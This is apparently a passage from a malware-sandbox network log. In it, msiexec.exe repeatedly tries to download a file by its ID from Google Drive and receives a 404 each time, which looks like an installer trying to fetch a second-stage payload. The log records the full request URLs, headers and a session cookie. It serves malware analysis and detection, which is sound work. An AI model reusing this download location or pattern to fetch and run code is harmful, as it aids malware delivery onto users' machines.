2025-01-11 03:27:20 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 4b 46 35 33 49 30 4e 6d 6b 37 64 30 69 63 75 75 54 44 4a 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fKF53I0Nmk7d0icuuTDJQQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.11	49999	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:21 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:21 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:21 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-8o8J0dPAf26I73o-ggVfFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.11	50000	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:22 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:22 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTZ4J6zhRp4YYWSLLYOz2LUV9erdwLBPgzWn_9pVfXOPsoORgS09P7A91mDbrba_C9WHh45PSw Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:22 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-6awo2_G_nTMKqICplqMb9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:22 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 37 35 46 4c 31 54 6d 38 6f 37 41 4a 73 75 56 52 33 6c 45 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q75FL1Tm8o7AJsuVR3lEWw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.11	50001	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:23 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:24 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:23 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-mJTIcWjojgL9M8GpJy4LQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.11	50002	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:24 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:25 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRAqpqPIL_uVxjATJnHB4R7Hgdb167rgZi85s6EKTCvxsdeDI7Xlm1T3IgX8YBhb1zJNXm3V2Q Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:24 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Q587Fl8PAMrt2tlK1wnAxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:25 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 4d 73 44 53 65 42 69 45 44 45 67 31 4d 6d 58 41 35 38 41 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kMsDSeBiEDEg1MmXA58A3A">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.11	50003	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:25 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:26 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:26 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-yqv1GszUm-nT71h6ZvWZTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.11	50004	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:26 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:27 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQFBZZnKMRfgTeRIhCvBnEdUmikbaZYZQ4HZgCgZX77xJfcjo9zOx07esj912NV-alw Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:27 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Tv6WPKivlf6l62SD8PNK3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:27 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 56 33 70 39 78 50 5a 33 79 6b 7a 44 41 30 55 34 47 72 34 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dV3p9xPZ3ykzDA0U4Gr4iw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.11	50005	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:28 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:28 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:28 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-gO2j-jhBw0Or8avTCUycIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.11	50006	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:29 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:29 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ7oiarDp-S-H1oEypFMqlSf4UfUKGh4x2MHb1UPwctkw1qSgB5fozksN0BDYpjx_VipdRqacg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:29 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-MZ76xVUieR744R2azQWmWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
